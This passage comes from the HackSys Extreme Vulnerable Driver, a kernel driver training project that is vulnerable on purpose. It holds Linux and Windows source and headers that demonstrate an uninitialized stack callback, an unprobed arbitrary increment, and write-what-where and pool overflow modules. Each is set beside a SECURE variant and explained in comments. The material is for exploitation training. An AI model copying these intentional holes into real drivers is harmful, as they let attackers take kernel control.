 */
int trigger_uninitialized_memory_stack(void *user_buffer, size_t size)
{
    unsigned long UserValue = 0;
    unsigned long MagicValue = 0xBAD0B0B0;
    int status = STATUS_SUCCESS;

#ifdef SECURE
    //
    // Secure Note: This is secure because the developer is properly initializing
    // UNINITIALIZED_MEMORY_STACK to zero, so Callback is NULL unless the magic
    // value matched, and the NULL check below then skips the call.
    //

    UNINITIALIZED_MEMORY_STACK UninitializedMemory = { 0 };
#else
    //
    // Vulnerability Note: This is a vanilla Uninitialized Memory in Stack vulnerability
    // because the developer is not initializing 'UNINITIALIZED_MEMORY_STACK'. When
    // 'MagicValue' does not match 'UserValue' the Callback field is never written,
    // yet it is still tested and called below.
    //

    UNINITIALIZED_MEMORY_STACK UninitializedMemory;
#endif

    // Single word read from user mode; faults are reported as -EINVAL.
    if(copy_from_user(&UserValue, user_buffer, sizeof(UserValue))) {
        ERR("Failed to copy UserValue from user space\n");

        status = -EINVAL;
        return status;
    }

    INFO("[+] UserValue: [0x%p] [0x%zX]\n", &UserValue, UserValue);
    INFO("[+] UninitializedMemory Address: 0x%p\n", &UninitializedMemory);

    // Only the magic value fully initializes the object.
    if (UserValue == MagicValue) {
        UninitializedMemory.Value = UserValue;
        UninitializedMemory.Callback = &UninitializedMemoryStackObjectCallback;
    }

#ifndef SECURE
    INFO("[+] Triggering Uninitialized Memory in Stack\n");
#endif

    // In the vulnerable build, on the non-magic path this reads and calls
    // through a stale stack word rather than a value set by this function.
    if (UninitializedMemory.Callback) {
        UninitializedMemory.Callback();
    }

    return status;
}
117 |
118 |
/**
 * IOCTL entry point for the uninitialized stack memory module.
 *
 * Forwards the user-mode input buffer and its declared length to
 * trigger_uninitialized_memory_stack(). A NULL input buffer is rejected with
 * -EINVAL; the length is passed through without inspection.
 *
 * @param[in] io user space buffer descriptor (input pointer and length)
 * @return status code from trigger_uninitialized_memory_stack(), or -EINVAL
 */
int uninitialized_memory_stack_ioctl_handler(struct hevd_io *io)
{
    void *input = io->input_buffer;
    size_t input_length = io->input_buffer_length;

    if (!input)
    {
        return -EINVAL;
    }

    return trigger_uninitialized_memory_stack(input, input_length);
}
139 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/UninitializedMemoryStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | uninitialized memory in Stack module.
48 |
49 | --*/
50 |
51 | #ifndef __UNINITIALIZED_MEMORY_STACK_H__
52 | #define __UNINITIALIZED_MEMORY_STACK_H__
53 |
54 | #include "Common.h"
55 |
56 |
57 | //
58 | // Structures
59 | //
60 |
//
// Stack object used by trigger_uninitialized_memory_stack(). In the vulnerable
// build it is declared without an initializer, so Value and Callback keep
// whatever an earlier stack frame left behind unless the caller's value matched
// the magic constant.
//
typedef struct _UNINITIALIZED_MEMORY_STACK
{
    unsigned long Value;        // set to the user value on the magic-match path
    FunctionPointer Callback;   // called if non-NULL; the field the bug leaves stale
    unsigned long Buffer[58];   // pads the object out on the stack; presumably sizing only — confirm
} UNINITIALIZED_MEMORY_STACK, *PUNINITIALIZED_MEMORY_STACK;
67 |
68 |
69 | //
70 | // Function Definitions
71 | //
72 |
73 | void
74 | UninitializedMemoryStackObjectCallback(void);
75 |
76 | int trigger_uninitialized_memory_stack(void *user_buffer, size_t size);
77 |
78 | #endif // !__UNINITIALIZED_MEMORY_STACK_H__
79 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryIncrement.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryIncrement.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | Arbitrary Increment vulnerability.
48 |
49 | --*/
50 |
51 | #include "ArbitraryIncrement.h"
52 |
53 | #ifdef ALLOC_PRAGMA
54 | #pragma alloc_text(PAGE, TriggerArbitraryIncrement)
55 | #pragma alloc_text(PAGE, ArbitraryIncrementIoctlHandler)
56 | #endif // ALLOC_PRAGMA
57 |
58 |
///
/// Trigger the Arbitrary Increment Vulnerability
///
/// Reads one pointer out of UserBuffer and increments the CHAR it points to.
/// Only UserBuffer itself is probed up front; whether the embedded pointer's
/// target is probed depends on the build:
///  - SECURE: ProbeForWrite() on the target, so a kernel address raises an
///    exception that the __except block converts into a status code.
///  - default: the increment is performed unchecked, so a kernel address
///    supplied by user mode is modified (the deliberate bug this module
///    demonstrates; SEH does not help because a valid kernel address does not
///    fault).
///
/// The pointer to user mode buffer (holds a single PCHAR)
/// NTSTATUS: STATUS_SUCCESS, or the SEH exception code
NTSTATUS
TriggerArbitraryIncrement(
    _In_ PVOID UserBuffer
    )
{
    NTSTATUS Status = STATUS_SUCCESS;

    PAGED_CODE();

    __try
    {
        //
        // Verify if the buffer resides in user mode (one pointer-sized,
        // pointer-aligned read)
        //

        ProbeForRead(UserBuffer, sizeof(PULONG_PTR), (ULONG)__alignof(PULONG_PTR));

        //
        // Grab the user pointer
        //

        PCHAR UserPointerToIncrementValue = *(PCHAR*)UserBuffer;

        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserPointerToIncrementValue: 0x%p\n", UserPointerToIncrementValue);

        //
        // NOTE(review): this dereferences the embedded pointer before the SECURE
        // ProbeForWrite() below, so even the secure build reads through an
        // unvalidated address here (inside __try, so a fault is caught). Also the
        // argument is a CHAR (promoted to int) while %zX expects a SIZE_T; the
        // format and argument do not match.
        //
        DbgPrint("[+] Value before increment: 0x%zX\n", *UserPointerToIncrementValue);

#ifdef SECURE

        //
        // Secure Note: This is secure because the developer is properly validating if
        // 'UserPointerToIncrementValue' resides in User mode by calling ProbeForWrite() routine before
        // performing the increment operation.
        // NOTE(review): the probe length is sizeof(PCHAR), a pointer size, while the
        // write below touches one CHAR; the probe is stricter than the access
        // (harmless), sizeof(CHAR) would match it exactly.
        //

        ProbeForWrite(UserPointerToIncrementValue, sizeof(PCHAR), (ULONG)__alignof(CHAR));

        (*(PCHAR)UserPointerToIncrementValue)++;
#else
        DbgPrint("[+] Triggering Arbitrary Increment\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Increment vulnerability
        // because the developer is incrementing value pointed by 'UserPointerToIncrementValue'
        // without properly validating if it resides in User mode
        //

        (*(PCHAR)UserPointerToIncrementValue)++;
#endif

        // Same %zX vs CHAR mismatch as the "before" print above.
        DbgPrint("[+] Value after increment: 0x%zX\n", *UserPointerToIncrementValue);
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        // Probe failures and faulting user addresses land here.
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}
124 |
125 |
///
/// Arbitrary Increment Ioctl Handler
///
/// Hands the METHOD_NEITHER input pointer (Type3InputBuffer, a raw user-mode
/// address the I/O manager has not validated) to TriggerArbitraryIncrement(),
/// which is responsible for probing it. A NULL pointer yields STATUS_UNSUCCESSFUL.
///
/// The pointer to IRP (unused)
/// The pointer to IO_STACK_LOCATION structure
/// NTSTATUS
NTSTATUS
ArbitraryIncrementIoctlHandler(
    _In_ PIRP Irp,
    _In_ PIO_STACK_LOCATION IrpSp
    )
{
    PVOID InputPointer;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    InputPointer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;

    if (InputPointer == NULL)
    {
        return STATUS_UNSUCCESSFUL;
    }

    return TriggerArbitraryIncrement(InputPointer);
}
153 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryIncrement.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryIncrement.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary increment module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_INCREMENT_H__
54 | #define __ARBITRARY_INCREMENT_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Function Definitions
61 | //
62 |
63 | NTSTATUS
64 | TriggerArbitraryIncrement(
65 | _In_ PVOID UserBuffer
66 | );
67 |
68 | #endif // !__ARBITRARY_INCREMENT_H__
69 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryReadWriteHelperNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryReadWriteHelperNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary read write helper in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
54 | #define __ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define MAX_OBJECT_COUNT 65535
64 | #define STATUS_INVALID_INDEX ((NTSTATUS)-1L)
65 |
66 |
67 | //
68 | // Structures
69 | //
70 |
//
// Kernel-side helper object kept in NonPagedPoolNx (per this module's abstract):
// a name buffer and its length. Field semantics are only visible in the .c file;
// presumably Name points to a separately allocated buffer of Length bytes — confirm.
//
typedef struct _ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
{
    PVOID Name;     // name buffer pointer
    SIZE_T Length;  // size associated with Name
} ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, *PARW_HELPER_OBJECT_NON_PAGED_POOL_NX;
76 |
//
// Request structure taken by the Create/Set/Get/Delete routines declared below.
// HelperObjectAddress identifies the kernel helper object a request refers to.
// NOTE(review): if Create returns the pool address of the new object through
// this field, a kernel pointer is handed back to user mode — an address
// disclosure that is presumably intentional for this helper module; confirm in
// the .c file.
//
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;  // kernel helper object this request refers to
    PVOID Name;                 // name buffer, presumably user-mode — confirm
    SIZE_T Length;              // length of Name in bytes — presumably; confirm
} ARW_HELPER_OBJECT_IO, *PARW_HELPER_OBJECT_IO;
83 |
84 |
85 | //
86 | // Function Definitions
87 | //
88 |
89 | INT
90 | GetFreeIndex(
91 | VOID
92 | );
93 |
94 | INT
95 | GetIndexFromPointer(
96 | _In_ PVOID Pointer
97 | );
98 |
99 | NTSTATUS
100 | CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
101 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
102 | );
103 |
104 | NTSTATUS
105 | SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
106 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
107 | );
108 |
109 | NTSTATUS
110 | GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
111 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
112 | );
113 |
114 | NTSTATUS
115 | DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx(
116 | _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
117 | );
118 |
119 | #endif // !__ARBITRARY_READ_WRITE_HELPER_NON_PAGED_POOL_NX_H__
120 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/ArbitraryWrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary write module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_WRITE_H__
54 | #define __ARBITRARY_WRITE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
//
// Request for TriggerArbitraryWrite(): two user-supplied pointers. Presumably
// the value read through What is written through Where — confirm in
// ArbitraryWrite.c. Because both pointers originate in user mode, a correct
// implementation must probe both before dereferencing either.
//
typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;   // source pointer
    PULONG_PTR Where;  // destination pointer
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | NTSTATUS
75 | TriggerArbitraryWrite(
76 | _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
77 | );
78 |
79 | #endif // !__ARBITRARY_WRITE_H__
80 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowNonPagedPool.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowNonPagedPool.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in NonPagedPool module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_NON_PAGED_POOL_H__
54 | #define __BUFFER_OVERFLOW_NON_PAGED_POOL_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
63 | #define POOL_BUFFER_SIZE 504
64 |
65 |
66 | //
67 | // Function Definitions
68 | //
69 |
70 | NTSTATUS
71 | TriggerBufferOverflowNonPagedPool(
72 | _In_ PVOID UserBuffer,
73 | _In_ SIZE_T Size
74 | );
75 |
76 | #endif // !__BUFFER_OVERFLOW_NON_PAGED_POOL_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowNonPagedPoolNx.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowNonPagedPoolNx.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in NonPagedPoolNx module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
54 | #define __BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Defines
61 | //
62 |
//
// Size in bytes of the NonPagedPoolNx allocation this module works with.
// The value is architecture dependent (496 on 64-bit, 504 on 32-bit);
// presumably chosen so that allocation plus pool header fill a fixed-size
// pool chunk — confirm against BufferOverflowNonPagedPoolNx.c (not in view).
// Sibling headers define the same macro name with a different value, so they
// are presumably never included into one translation unit together.
//
#ifdef _WIN64
#define POOL_BUFFER_SIZE 496
#else
#define POOL_BUFFER_SIZE 504
#endif
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
//
// Implemented in BufferOverflowNonPagedPoolNx.c (not in view). By its naming
// UserBuffer is a user-mode pointer and Size the caller's length, so both are
// untrusted on entry and must be validated by the implementation.
//
NTSTATUS
TriggerBufferOverflowNonPagedPoolNx(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
);
79 |
80 | #endif // !__BUFFER_OVERFLOW_NON_PAGED_POOL_NX_H__
81 |
--------------------------------------------------------------------------------
/Driver/HEVD/Windows/BufferOverflowPagedPoolSession.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
